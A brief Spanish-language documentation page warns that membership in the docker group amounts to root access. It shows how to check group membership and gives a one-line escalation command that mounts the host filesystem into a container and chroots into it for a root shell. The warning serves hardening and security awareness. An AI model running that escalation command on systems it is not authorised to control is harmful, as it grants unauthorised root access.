# Docker

{% hint style="danger" %}

#### 🔥 Si `user` está en el grupo `docker` → **PROBLEMA GRAVE**

Porque Docker = root efectivo.

Compruébalo:

```sh
groups user
```

Si ves:

```sh
user docker
```

Entonces **ya es root**, incluso sin sudo.

Ejemplo de escalada inmediata:

```sh
docker run -it --rm -v /:/host alpine chroot /host sh
```

💥 Root total.
{% endhint %}